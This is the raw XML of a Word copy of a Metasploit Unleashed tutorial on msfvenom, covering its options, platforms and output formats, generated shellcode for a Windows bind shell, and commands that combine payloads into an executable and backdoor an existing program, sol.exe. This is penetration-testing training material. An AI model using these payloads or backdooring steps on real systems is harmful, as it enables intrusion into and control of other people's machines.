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</w:pPr>
      <w:r w:rsidRPr="0050104B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  <w:t>MSFVENOM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0050104B" w:rsidRPr="0050104B" w:rsidRDefault="0050104B" w:rsidP="00501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0104B" w:rsidRPr="0050104B" w:rsidRDefault="0050104B" w:rsidP="0050104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4807585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="msfvenom replaces msfpayload and msfe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fvenom replaces msfpayload and msfen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4B" w:rsidRPr="0050104B" w:rsidRDefault="0050104B" w:rsidP="0050104B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        <w:spacing w:before="60" w:after="105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replaces </w:t>
      </w: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| Metasploit Unleashed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</w:pPr>
      <w:r w:rsidRPr="0050104B"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  <w:t>USING THE MSFVENOM COMMAND LINE INTERFACE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 is a combination of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, putting </w:t>
      </w:r>
      <w:proofErr w:type="gram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both of these</w:t>
      </w:r>
      <w:proofErr w:type="gram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tools into a single Framework instance.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 replaced both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as of June 8th, 2015.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The advantages of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are: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One single tool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Standardized command line options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Increased speed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lastRenderedPageBreak/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has a wide range of options available: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-h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 a Metasploit standalone payload generator.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Also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 replacement for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and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msfencode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Usage: /opt/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metasploit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/apps/pro/msf3/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[options] &lt;var=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val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&gt;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Options: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-h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Error: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 a Metasploit standalone payload generator.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Also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 replacement for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and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msfencode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Usage: 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usr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/bin/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[options]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Options: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-p, --payload           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to use. Specify a '-' or stdin to use custom payloads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--payload-options            List the payload's standard options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-l, --list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[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type]       List a module type. Options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are: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payloads, encoders,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all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-n, --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nopsled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     Prepend a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nopsled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[length] size on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-f, --format              Output format (use --help-formats for a list)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--help-formats               List available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-e, --encoder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encoder to use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-a, --arch     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architecture to use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--platform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platform of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--help-platforms             List available platforms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-s, --space  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maximum size of the resulting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--encoder-space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maximum size of the encoded payload (defaults to the -s value)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-b, --bad-chars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list of characters to avoid example: '\x00\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'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--iterations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number of times to encode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-c, --add-code              Specify an additional win32 shellcode file to include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-x, --template              Specify a custom executable file to use as a template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-k, --keep                       Preserve the template behavior and inject the payload as a new thread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-o, --out                   Save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-v, --var-name              Specify a custom variable name to use for certain output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 xml:space="preserve">        --smallest                   Generate the smallest possible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-h, --help                       Show this message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Command Line Usage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We can see an example of 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line below and its output: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3 -f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Attempting to encode payload with 3 iterations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353 (iteration=1)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380 (iteration=2)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380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380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\x78\xd0\x11\xe9\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\xd8\xd9\x74\x24\xf4\x58\x31"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"\xc9\xb1\x59\x31\x58\x13\x83\xc0\x04\x03\x58\x77\x32"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"\xe4\x53\x15\x11\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\xc0\x91\x2c\x8b\xd6\xe9\x94"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"\x47\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\xa3\x79\x2b\x1c\xc7\x4c\x78\xb2\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"\xc2\x9d\x53\x59\xa6\x37\xc3\x57\x11\xc8\x77\x77\x9e"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"\x6d\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\x82\xf9\xc0\x9a\x35\x72\x7d\x01\x9b"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"\xe7\x31\x16\x82\xf6\xe2\x89\x89\x75\x67\xf7\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"\x73\x88\x3f\xf5\x6d\x3d\x9e\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\x06\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\x42\x7a"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"\x63\x6b\x72\x59\xf6\x58\xa5\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\x3f\x0b\x41\xa0\xf2"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\x2d\xc9\x32\x3d\xd4\x51\xf7\xa7\x56\xf8\x69\x08"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"\x4d\x27\x8a\x2e\x19\x99\x7c\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\x63\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\x5c\xd5\xa8"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"\x1f\xa8\x9b\x88\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\xa5\x3c\x8f\x7f\x38\x45\xd1\x71"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"\x34\x59\x84\xb0\x97\xa0\x99\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\x7f\x37\xe2\x28"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\x57\x01\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\xf8\x1e\x1e\xd8\xd3\x05\x67\x73\xf9"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\x76\x8c\x7c\x2f\xf6\x29\x0f\xa5\x36\x2e\x73"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\x31\xc3\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\x49\x64\xd2\x39\xf1\xf2\xc7\xa0"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"\x06\xd3\xf6\x1a\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\x0a\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\x1a\x42\x9c\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"\x01\x16\x27\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\x29\x1c\xf8\x7d\x47\x2c\x68\x06\x0e"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"\x23\x31\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\x7d\x58\xe8\x7b\x76\x4b\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\x17\x51"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\xc5\x66\x4b\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\x23\x86\x47\xb4"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"\xe7\xd5\x71\x77\x2e\x24\x4a\x3d\xb1\x6f\x12\xf2\xb2"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"\xd0\x55\xc9\x23\x2e\xc2\xa5\x73\xb2\xc8\xb7\x7d\x6b"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"\x55\x29\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\x26\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\xf6\xe3\xf6\x25\xc6\x5c\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\x9c"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"\x9d\x18\x08\x3b\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\x92\x18\x5f\x48\x9b\xe0"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"\x7b\x03\xa5\x32\x11\x27\x2b\x25\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\x44\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\xb9"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\x56\x4c\x56\xd5\x04\x87\x48\x3a\x6b\x9c"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"\x2a\x15\x4d\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\x0b\x56\x06\xb5\xc9\x46\xd0\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"\xa6\x76\xe9\x52\x2c\x24\x62\x28\xe1\x1d\x87\xb0\x66"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"\x93\x85\x8f\x87\x0f\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\x16\x29\x76\x03\x55\x0c\x0e"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"\x3f\x17\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and resulting shellcode above generates a Windows </w:t>
      </w:r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bind shell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with three iterations of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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encoder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without any null bytes and in the python format.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Platforms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Here is a list of available platforms one can enter when using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–platform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switch.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Cisco or cisco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OSX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osx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Solaris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solaris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OpenBSD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openbsd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hardware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Firefox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firefox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NetBSD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netbsd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NodeJS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nodejs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FreeBSD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freebsd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Python or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AIX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JavaScript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javascript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HPUX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hpux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PHP or php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Irix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irix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Unix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unix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Linux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linux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Ruby or ruby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Java or java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Android or android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Netware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netware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Windows or windows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mainframe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multi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Options and Uses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-v or –var-name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Usage: -v, –var-name &gt;name&gt;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lastRenderedPageBreak/>
        <w:t>Specify a custom variable name to use for certain output formats. Assigning a name will change the output’s variable from the default “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buf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” to whatever word you supplied.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Default output example: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\xd9\x74\x24\xf4\x5b\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\xc5\x5e\xc1\x6a\x29"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Using –var-name output example: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 -v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notBuf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notBuf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notBuf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\xd1\xd9\x74\x24\xf4\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\xf0\x1f\xb8\x27\x5a"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–help-format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Issuing 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with this switch will output all available payload formats.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--help-formats</w:t>
      </w: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Executable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asp,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aspx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aspx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-exe,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dll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elf, elf-so, exe, exe-only, exe-service, exe-small,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hta-psh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loop-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macho,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msi-nouac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osx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-app,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-net,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-reflection,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psh-cmd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-exe,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vba-psh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war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 xml:space="preserve">Transform formats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bash, c,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csharp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dw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dword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hex, java,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js_be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js_le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num,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perl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pl,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powershell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ps1,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py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python, raw,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ruby,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vbapplication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vbscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-n, –</w:t>
      </w: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nopsled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br/>
        <w:t>Sometimes you need to add a few NOPs at the start of your payload. This will place a NOP sled of [length] size at the beginning of your payload.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BEFORE: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generic/none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generic/none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299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\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" **First line of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"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"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AFTER: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generic/none -f python -n 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generic/none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Successfully added NOP sled from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single_byte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325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 += "\x98\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\x40\xf9\x43\x49\x40\x4a\x98\x49\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\x37\x43" **NOPs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 += "\x42\xf5\x92\x42\x42\x98\xf8\xd6\x93\xf5\x92\x3f\x98"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\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" **First line of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–smallest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br/>
        <w:t>If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–smallest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switch is used,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msfvevom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will attempt to create the smallest shellcode possible using the selected encoder and payload.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 --smallest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312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312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312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-c, –add-code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Specify an additional win32 shellcode file to include, essentially creating a two (2) or more payloads in one (1) shellcode.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Payload #1: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TEXT="MSFU Example" -f raw &gt;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267 bytes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Adding payload #2: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-c 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TEXT="We are evil" -f raw &gt; messageBox2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Adding shellcode from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Payload size: 850 bytes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Adding payload #3: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-c messageBox2 </w:t>
      </w:r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-f exe -o cookies.exe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Adding shellcode from messageBox2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1469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Saved as: cookies.exe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Running the </w:t>
      </w:r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cookies.exe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file will execute both message box payloads, as well as the bind shell using default settings (port 4444).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noProof/>
          <w:color w:val="A90C1C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="1790700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="msfvenom_c_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fvenom_c_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-x, –template &amp; -k, –keep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-x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or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–template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option is used to specify an existing executable to use as a template when creating your executable payload.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Using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-k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or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–keep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, option in conjunction will preserve the template’s normal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behaviour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have your injected payload run as a separate thread.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-x sol.exe -k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lhost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=192.168.101.133 -b "\x00" -f exe -o sol_bdoor.exe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10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299 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0050104B" w:rsidRDefault="0050104B" w:rsidP="000E28B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Saved as: sol_bdoor.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E28B2" w:rsidRPr="000E28B2" w:rsidRDefault="000E28B2" w:rsidP="000E28B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FEFEFE"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E28B2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Source :</w:t>
      </w:r>
      <w:r w:rsidRPr="000E28B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>MSFvenom</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:bookmarkStart w:id="0" w:name="_GoBack"/>
        <w:bookmarkEnd w:id="0"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>- Metasploit Unleashed (offensive-security.com)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000E28B2" w:rsidRPr="000E28B2" w:rsidRDefault="000E28B2" w:rsidP="000E28B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000E28B2" w:rsidRPr="000E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484F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="71D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4B"/>
    <w:rsid w:val="000E28B2"/>
    <w:rsid w:val="005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DF7E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{79B26A3C-1E77-4964-B29A-D56DC70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0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0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p-caption-text">
    <w:name w:val="wp-caption-text"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0050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104B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="005010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2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ensive-security.com/metasploit-unleashed/msfven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ensive-security.com/wp-content/uploads/2015/05/msfvenom_c_2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almustafa</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>bara almustafa</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-01T06:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-01T06:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>